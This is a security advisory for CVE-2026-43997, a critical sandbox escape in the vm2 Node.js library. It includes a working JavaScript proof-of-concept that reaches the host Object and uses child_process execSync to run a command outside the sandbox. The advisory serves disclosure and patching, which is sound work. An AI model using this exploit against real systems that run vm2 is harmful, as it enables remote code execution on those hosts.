CVE-2026-43997

CRITICAL 10.0 · EPSS 0.02%

vm2 Access to Host Object Enables Sandbox Escape

Published: 2026/5/7 · Modified: 2026/5/14

Description

### Summary

It is possible to obtain the host `Object`. Commit https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.

### Details

There are various ways to use the host `Object` to escape the sandbox. One example is using `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`.

### PoC

```js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, ['__proto__']]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
const obj = {
  [sym]: (depth, opt, inspect) => {
    inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
  },
  valueOf: undefined,
  constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```

### Impact

Sandbox Escape -> RCE

Affected packages (1)

CVSS Score

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 3.1 | CRITICAL 10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

References (4)